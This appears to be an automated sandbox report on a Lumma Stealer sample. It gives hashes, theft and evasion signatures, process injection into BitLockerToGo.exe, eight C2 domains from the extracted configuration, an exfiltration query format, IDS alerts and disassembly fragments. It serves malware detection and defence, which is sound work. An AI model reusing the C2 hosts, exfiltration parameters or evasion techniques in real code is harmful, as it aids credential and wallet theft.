
Windows Analysis Report
HLZwUhcJ28.exe

Overview

General Information

Sample name: HLZwUhcJ28.exe (renamed because original name is a hash value)
Original sample name: 4b93cf26d6e6c52e332e084f0940c5e687a91b08e66ee822aae302d1b1f3c014.exe
Analysis ID: 1545779
MD5: b736da6a81e01bebfdd469d26785e13c
SHA1: e82d651e62747674fd6c8bfeb2ebdb569f572c9f
SHA256: 4b93cf26d6e6c52e332e084f0940c5e687a91b08e66ee822aae302d1b1f3c014
Tags: arch-x64, arch-x86, exe, image-win10v2004-20241007-en, locale-en-us, os-windows10-2004-x64, system, https-tipneikidev, https-traige, user-NeikiSamples

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • HLZwUhcJ28.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\HLZwUhcJ28.exe" MD5: B736DA6A81E01BEBFDD469D26785E13C)
    • Imperial_Delay.exe (PID: 1136 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe" MD5: C1A90FA945AD6CED2104263762C7FCB4)
      • BitLockerToGo.exe (PID: 2676 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration: {"C2 url": ["heroicmint.sbs", "wrigglesight.sbs", "ferrycheatyk.sbs", "snailyeductyi.sbs", "captaitwik.sbs", "monstourtu.sbs", "sidercotay.sbs", "deepymouthi.sbs"], "Build id": "tLYMe5--3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
00000002.00000003.1951968090.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1983486359.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1982657253.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1981505063.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1983200877.0000000002D0F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched

Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T01:05:23.695491+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:24.818599+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:23.695491+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:24.818599+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:20.681200+0100 | 2056750 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58904 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.635488+0100 | 2056752 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 63735 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.704815+0100 | 2056754 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60925 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.659161+0100 | 2056756 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 52412 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.647197+0100 | 2056760 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 59066 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.670626+0100 | 2056762 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 62213 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.715001+0100 | 2056764 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49626 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.691871+0100 | 2056766 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 57319 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:33.735583+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:22.218518+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49734 | 104.102.49.254 | 443 | TCP

AV Detection

Source: HLZwUhcJ28.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe | Avira: detection malicious, Label: TR/Redcap.tpgxx
Source: 1.2.Imperial_Delay.exe.a488000.1.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["heroicmint.sbs", "wrigglesight.sbs", "ferrycheatyk.sbs", "snailyeductyi.sbs", "captaitwik.sbs", "monstourtu.sbs", "sidercotay.sbs", "deepymouthi.sbs"], "Build id": "tLYMe5--3"}
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Imperial_Delay.exe | ReversingLabs: Detection: 83%
Source: HLZwUhcJ28.exe | ReversingLabs: Detection: 50%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: snailyeductyi.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: ferrycheatyk.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: deepymouthi.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wrigglesight.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: captaitwik.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sidercotay.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: heroicmint.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: monstourtu.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: deepymouthi.sbs
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000001.00000002.1881617580.000000000A8E0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tLYMe5--3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041F5CB CryptUnprotectData | 2_2_0041F5CB
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.196:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: HLZwUhcJ28.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb00 source: Qt5SqlVBox.dll
Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxClient-x86\VBoxClient-x86.pdb source: VBoxClient-x86.dll.0.dr
Source: Binary string: BitLockerToGo.pdb source: Imperial_Delay.exe, 00000001.00000002.1881484672.000000000A700000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5GuiVBox.pdb source: Qt5GuiVBox.dll
Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxClient-x86\VBoxClient-x86.pdb<<9 source: VBoxClient-x86.dll.0.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: Imperial_Delay.exe, 00000001.00000002.1881484672.000000000A700000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: HLZwUhcJ28.exe
Source: Binary string: R:\tinderbox\win-qt-5.15\out\qtbase\plugins\sqldrivers\qsqlite.pdb source: qsqlite.dll.0.dr
Source: Binary string: r:\tinderbox\win-qt-5.15\out\qtbase\lib\Qt5SqlVBox.pdb source: Qt5SqlVBox.dll
Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxProxyStub-x86\VBoxProxyStub-x86.pdb source: VBoxProxyStub-x86.dll.0.dr
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECEECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn | 0_2_00007FF70ECEECE0
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ECD647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn | 0_2_00007FF70ECD647C
Source: C:\Users\user\Desktop\HLZwUhcJ28.exe | Code function: 0_2_00007FF70ED03130 FindFirstFileExA | 0_2_00007FF70ED03130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h | 2_2_0042D020
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-515AFC65h] | 2_2_004321CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 2_2_004321CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [edx], al | 2_2_004321CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebx, dword ptr [esi] | 2_2_004321CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [esi+edx-4D4CB3B5h] | 2_2_004321CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+edx+3BB86854h] | 2_2_004321CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edi, ecx | 2_2_004321CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+585213E0h] | 2_2_00444200
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov esi, ecx | 2_2_00410310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0041F5CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 2_2_0040F6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+2A1E1BB5h] | 2_2_0040F6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, eax | 2_2_0040D740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [edi], ax | 2_2_004108C6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [ecx], ax | 2_2_0041F8F4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [edi+ecx-42B872D0h] | 2_2_00443A46
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 2_2_00431C50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, ebx | 2_2_0040FDCC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+edx] | 2_2_00447F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h | 2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h | 2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 2_2_00429170
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov esi, dword ptr [ebp-44h] | 2_2_0042F221
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp esi | 2_2_004202C1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+esi-221F534Ah] | 2_2_0042C2D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov esi, eax | 2_2_0042C2D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov dword ptr [esp+30h], 0206040Eh | 2_2_00430280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 2_2_00430280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, dword ptr [ebx+edx] | 2_2_0042E343
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebp, eax | 2_2_0042E343
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ebx | 2_2_0040F345
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_004293D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx-69h] | 2_2_004293D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0040F39C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then add ecx, eax | 2_2_0042C5E2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then push esi | 2_2_0042A593
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-09h] | 2_2_0042C5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, dword ptr [0044FEE0h] | 2_2_0042C5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 07E776F1h | 2_2_0042C5A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_00409602
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp al, 2Eh | 2_2_0042D621
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, eax | 2_2_0042D621
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp dword ptr [0044FFC8h] | 2_2_0042D621
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then push eax | 2_2_004466F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ebp | 2_2_004466F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi] | 2_2_00441770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, ebp | 2_2_0040A8F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, ebp | 2_2_0040A8F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 2_2_00430991
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 07E776F1h | 2_2_0042E9BD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 2_2_00430A1E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-08h] | 2_2_00423AD1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+08h] | 2_2_00423AD1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ebp | 2_2_00446AA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3EDD3066h] | 2_2_00421AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp di, 005Ch | 2_2_00421AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edi, dword ptr [esp+0Ch] | 2_2_00421AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [esi], cl | 2_2_00421AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+08h] | 2_2_00442AB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, esi | 2_2_0042BABB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-08h] | 2_2_00423ABE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+08h] | 2_2_00423ABE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx-271B4865h] | 2_2_00424B50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ebp | 2_2_00446BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 2_2_00410BB6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, byte ptr [ebx] | 2_2_0040DC00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_0043AC20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 2_2_0043FCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esi+edi] | 2_2_00404D40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ebx] | 2_2_00405DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_00430E70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 07E776F1h | 2_2_0042EE18
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-2AF4E5B5h] | 2_2_00423E90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+08h] | 2_2_00441EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 2_2_0042EF36
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, ecx | 2_2_00420FE9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ebp | 2_2_00446F80

Networking

              Source: Network trafficSuricata IDS: 2056762 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sidercotay .sbs) : 192.168.2.4:62213 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056764 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snailyeductyi .sbs) : 192.168.2.4:49626 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056760 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (monstourtu .sbs) : 192.168.2.4:59066 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056766 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrigglesight .sbs) : 192.168.2.4:57319 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056754 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ferrycheatyk .sbs) : 192.168.2.4:60925 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056752 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deepymouthi .sbs) : 192.168.2.4:63735 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056756 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (heroicmint .sbs) : 192.168.2.4:52412 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2056750 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captaitwik .sbs) : 192.168.2.4:58904 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49743 -> 104.21.32.196:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.32.196:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.32.196:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49734 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 104.21.32.196:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 104.21.32.196:443
              Source: Malware configuration extractorURLs: heroicmint.sbs
              Source: Malware configuration extractorURLs: wrigglesight.sbs
              Source: Malware configuration extractorURLs: ferrycheatyk.sbs
              Source: Malware configuration extractorURLs: snailyeductyi.sbs
              Source: Malware configuration extractorURLs: captaitwik.sbs
              Source: Malware configuration extractorURLs: monstourtu.sbs
